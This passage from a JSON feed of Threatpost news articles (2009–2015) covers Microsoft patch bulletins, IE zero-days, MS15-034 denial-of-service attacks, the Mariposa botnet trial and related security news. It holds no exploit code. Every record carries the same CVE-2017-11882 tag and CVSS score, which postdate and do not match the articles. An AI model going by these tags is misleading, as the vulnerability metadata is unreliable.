a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[](<https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/>)There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within \nInternet Explorer. It is possible under certain conditions for the \ninvalid flag reference to be accessed after an object is deleted. In a \nspecially-crafted attack, in attempting to access a freed object, \nInternet Explorer can be caused to allow remote code execution.\n\n\u201cAt \nthis time, we are aware of targeted attacks attempting to use this \nvulnerability. We will continue to monitor the threat environment and \nupdate this advisory if this situation changes. On completion of this \ninvestigation, Microsoft will take the appropriate action to protect our \ncustomers, which may include providing a solution through our monthly \nsecurity update release process, or an out-of-cycle security update, \ndepending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that \ncontains a Web page that is used to exploit this vulnerability. In \naddition, compromised Web sites and Web sites that accept or host \nuser-provided content or advertisements could contain specially crafted \ncontent that could exploit this vulnerability. In all cases, however, an \nattacker would have no way to force users to visit these Web sites. \nInstead, an attacker would have to convince users to visit the Web site, \ntypically by getting them to click a link in an e-mail message or \nInstant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "description": "[](<https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/>)Microsoft has released a one-click \u201cfix-it\u201d workaround to help Internet Explorer users block malware attacks against an unpatched browser vulnerability.\n\nThe Fix-It workaround, [available here](<http://support.microsoft.com/kb/981374>), effectively disables peer factory in the iepeers.dll binary in affected versions of Internet Explorer. \n\nThe workaround comes on the heels of the [public release of exploit code](<https://threatpost.com/exploit-code-published-latest-ie-zero-day-031010/>) into the freely available Metasploit pen-testing framework.\n\nMicrosoft acknowledged the availability of exploit code for the issue and again urged users to upgrade to Internet Explorer 8, which is not vulnerable to this issue.\n\nThe company urged IE users to test the Fix-It workaround thoroughly before deploying as certain functionality that depends on the peer factory class, such as printing from Internet Explorer and the use of web folders, may be affected.\n\nMicrosoft also [confirmed](<http://blogs.technet.com/msrc/archive/2010/03/12/update-on-security-advisory-981374.aspx>) it is considering an out-of-band emergency patch to correct the underlying flaw.\n\nWe have seen speculation that Microsoft might release an update for this issue out-of-band. I can tell you that we are working hard to produce an update which is now in testing. This is a critical and time intensive step of the process as the update must be tested against all affected versions of Internet Explorer on all supported versions of Windows. Additionally, each supported language version needs to be tested as well as testing against thousands of third party applications. We never rule out the possibility of an out-of-band update. When the update is ready for broad distribution, we will make that decision based on customer needs. \n\nMalicious hackers are already exploiting the vulnerability to launch targeted attacks. The earliest attacks include the use of a backdoor that allows complete access to a vulnerable machine.\n\nThe backdoor allows an attacker to perform various functions on the compromised system, including uploading and downloading files, executing files, and terminating running processes.\n", "cvss3": {}, "published": "2010-03-15T14:17:12", "type": "threatpost", "title": "Microsoft Issues Fix-It Workaround for IE Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:14:29", "id": "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "href": "https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/73686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:45", "description": "[](<https://threatpost.com/closer-look-eleonore-exploit-kit-052410/>)For the second month in a row, Microsoft has tried to eradicate a \nmutating rootkit that has blocked some Windows users from installing \nsecurity updates. [Read the full article](<http://www.computerworld.com/s/article/9177223/Microsoft_smacks_patch_blocking_rootkit_second_time>). [Computerworld]\n", "cvss3": {}, "published": "2010-05-24T14:11:11", "type": "threatpost", "title": "Microsoft Battles Alureon Rootkit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:43:31", "id": "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "href": "https://threatpost.com/microsoft-battles-alureon-rootkit-052410/74006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "description": "One of the men authorities allege to have been behind the massive\u2013and now dead\u2013[Mariposa botnet](<https://threatpost.com/gaps-international-cyber-law-could-hamper-mariposa-case-092910/>), has gone on trial in Slovenia, more than two years after the initial arrests and takedown of the network. \n\nMariposa was one of the first handful of botnets that authorities and security researchers worked together to dismantle. The network appeared on the scene in early 2009 and researchers and law enforcement officials took notice. A working group was formed and researchers began looking at ways to disrupt the botnet\u2019s operation while law enforcement agencies searched for ways to identify the people behind it.\n\nBy the end of the year, researchers in the working group had gathered enough information to take a shot at bringing down Mariposa. In December 2009 researchers announced that they had taken down the botnet after monitoring the communications among the operators and between the infected machines and the command-and-control servers for some time. Soon after, authorities in Spain arrested three suspects they said were involved in running Mariposa, which at one time had approximately 12.5 million machines under its control.\n\nIn the summer of 2010, officials in Slovenia arrested Matjaz Skorjanc, whom they allege is the man who created the bot software and network and then sold it to other attackers for their own use. Skorjanc on Tuesday reportedly appeared in court in Slovenia for the beginning of his trial, according to [TechWeek Europe](<http://www.techweekeurope.co.uk/news/mariposa-botnet-trial-88628>). The three suspects arrested in Spain have yet to stand trial.\n\n \n\n", "cvss3": {}, "published": "2012-08-07T15:48:18", "type": "threatpost", "title": "Alleged Mariposa Botmaster in Court", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:44", "id": "THREATPOST:FBDE9552D48B698542D65DEA64890566", "href": "https://threatpost.com/alleged-mariposa-botmaster-court-080712/76886/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:06", "description": "[](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>)LAS VEGAS\u2013In the face of mounting external pressure to begin paying bug bounties, Microsoft is instead launching a new program that will pay a $200,000 top prize to a security researcher who develops the most innovative defensive security technology. The program is designed to \u201cinspire researchers to focus their talents on defensive technologies,\u201d the company said.\n\nKnown as the Blue Hat Prize, after the company\u2019s regular internal research conferences, the program will focus in its first year on getting researchers to design a novel runtime technology to defend against memory safety vulnerabilities. Microsoft security officials said that rather than paying for individual bugs the way that some other companies such as Google, Mozilla and others do, they wanted to encourage researchers to think about ways to defeat entire classes of bugs.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d said Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nUnder the rules of the Blue Hat Prize program, any researcher 14 or older is eligible, and the researchers who win prizes will not only get the cash prize, but also will retain full intellectual property rights to the technology. The winners have to agree to license the technology to Microsoft, however.\n\nThe top prize is $200,000, with second prize paying $50,000 and third prize is a one-year MSDN subscription, which is worth $10,000. Microsoft also will fly the three winners to Black Hat next year.\n\nResearchers have been calling for [Microsoft to start a bug bounty program](<https://threatpost.com/does-microsoft-need-bug-bounties-050511/>) for several years now, and company officials has repeatedly said that Microsoft is not interested in paying for individual vulnerabilities. This new program gets around the semantics of all that by encouraging researchers to find a new way to mitigate attacks against an entire class of bugs. \n\n\u201cTwo examples of open \nproblems that are suitable for consideration in this challenge are address space \ninformation disclosures and return-oriented programming (ROP). Note that you are \nnot required to address these and you are not limited to these examples,\u201d Microsoft said in the rules for the program, which are on the [Blue Hat Prize site](<http://www.microsoft.com/security/bluehatprize/>). \n\nEntries are going to be judged by a panel of security experts from Microsoft teams, including the Microsoft Security Response Center, the Windows team and others. \n\nMoussouris said that Microsoft was looking for a way to inspire researchers to focus their talents on defensive technologies and not just finding bugs.\n\n\u201cThis seemed the best way for us to engage with the research community and protect customers simultaneously,\u201d she said.\n", "cvss3": {}, "published": "2011-08-03T17:34:12", "type": "threatpost", "title": "Microsoft to Pay $200,000 for Innovative Defense Technology in Blue Hat Prize Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:03", "id": "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "href": "https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/75507/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. A rule passed last year called the \u2018Right To Be Forgotten\u2019 rule allows users to ask their name be removed if the results were inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:40", "description": "[](<https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/>)There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords, are exactly that \u2013personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:02", "description": "**UPDATE \u2013 **Microsoft\u2019s characterization of [MS15-034](<https://technet.microsoft.com/library/security/MS15-034>) as a remote code execution vulnerability certainly has a lot of Windows server admins on edge waiting for the other shoe to drop.\n\nIn the three days since the bulletin was released warning of a [critical vulnerability in the HTTP protocol stack](<https://threatpost.com/microsoft-patches-critical-http-sys-vulnerability/112251>), HTTP.sys, security experts, including the SANS Institute, have warned of publicly available denial-of-service exploits targeting Microsoft IIS webservers. There\u2019s also the possibility of information leakage via this issue that could pave the way for more serious attacks, but for now, a crashing and rebooting IIS server might be your only sign of trouble.\n\n\u201cSo far we see active exploitation for the denial-of-service vulnerability. The information disclosure vulnerability has been demonstrated, but we have not seen it used against any of our honeypots yet, nor have we seen any reports of it being used in attacks,\u201d Johannes Ullrich of the SANS Institute told Threatpost.\n\nUllrich was quick to point out too that there are Internet-wide scans happening now, that are not just looking for vulnerable servers, but also trying to crash them.\n\n\u201cIt\u2019s extremely easy to exploit,\u201d Ullrich said during an emergency webcast last night. \u201cThat\u2019s the problem with this vulnerability, it\u2019s so easy.\u201d\n\nMicrosoft, meanwhile, said customers should prioritize this bulletin and patch as soon as possible.\n\n\u201cUpdate MS15-034 was classified as a remote code execution bulletin because, while that type of exploit is harder to carry out it is theoretically possible,\u201d said a Microsoft spokesperson.\n\nThe SANS Internet Storm Center yesterday [raised its alert level](<https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/1/>), and said active exploits were hitting its honeypots from 78[.]186[.]123[.]180. Some reported to the ISC attacks they believed were more targeted against specific webservers.\n\n\u201cIf you have been the subject of a denial-of-service attack in the past, this is a much better and easier way to achieve the same thing than doing NTP reflection or whatever against your server,\u201d Ullrich said. \u201cThis is the main exposure right now.\u201d\n\nWhile IIS, or Internet Information Services servers, are the principal attack vector right now, this isn\u2019t necessarily solely an IIS problem. Lots of services make use of HTTP.sys.\n\n\u201cIt\u2019s really not an IIS vulnerability, but it is exposed via IIS,\u201d Ullrich said. \u201cThe HTTP.sys vulnerability: Every Windows system has it whether it\u2019s running IIS or not. It\u2019s a system library that implements the parsing of http requests and implements caching content in kernel memory.\u201d\n\nOne of Microsoft\u2019s workarounds, for example, was to disable IIS kernel caching, but there is a gotcha.\n\n\u201cTurning off kernel caching will prevent the exploit. The system is only vulnerable if kernel caching is turned on,\u201d Ullrich said. \u201cHowever, it will cause a significant loss in performance, so this may then turn into a denial of service for a busy site as it can no longer fulfill all requests.\u201d\n\nThe crux of the vulnerability lies in the range header, which extracts portions of webpages from kernel memory and passes them to the client. A [specifically crafted range header](<http://blog.didierstevens.com/2015/04/17/ms15-034-detection-some-observations/>) will trigger the denial-of-service vulnerability so long as certain conditions are met within the range. This has the potential to be quite disruptive, despite the vast majority of webservers being Linux boxes (70 million Windows servers could be affected according to [Netcraft](<http://news.netcraft.com/archives/2015/04/16/critical-windows-vulnerability-affects-at-least-70-million-websites.html>)).\n\nThe information disclosure weakness is concerning as well because there are ways to get a kernel memory dump back in a response from HTTP.sys. This will evoke memories of Heartbleed, which also led to memory leakage and inevitably a slew of exploits with varying results. Ullrich said that memory disclosure in this case, however, is trickier to retrieve than with Heartbleed, but it could be used to inch closer to remote code execution.\n\n\u201cCurrently, there is no known exploit that would cause remote code execution. Likely, an attacker would first have to use the information disclosure vulnerability to learn more about the internal memory layout to then follow up with a remote code execution exploit,\u201d he said. \u201cBut since the information disclosure attack will also cause a reboot, this information may not be all that valuable.\u201d\n\n_This article was updated at 1 p.m. ET with a comment from Microsoft._\n", "cvss3": {}, "published": "2015-04-17T11:06:54", "type": "threatpost", "title": "Active DoS Exploits for MS15-034 Under Way", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T14:51:48", "id": "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "href": "https://threatpost.com/active-dos-exploits-for-ms15-034-under-way/112314/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows &amp;, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 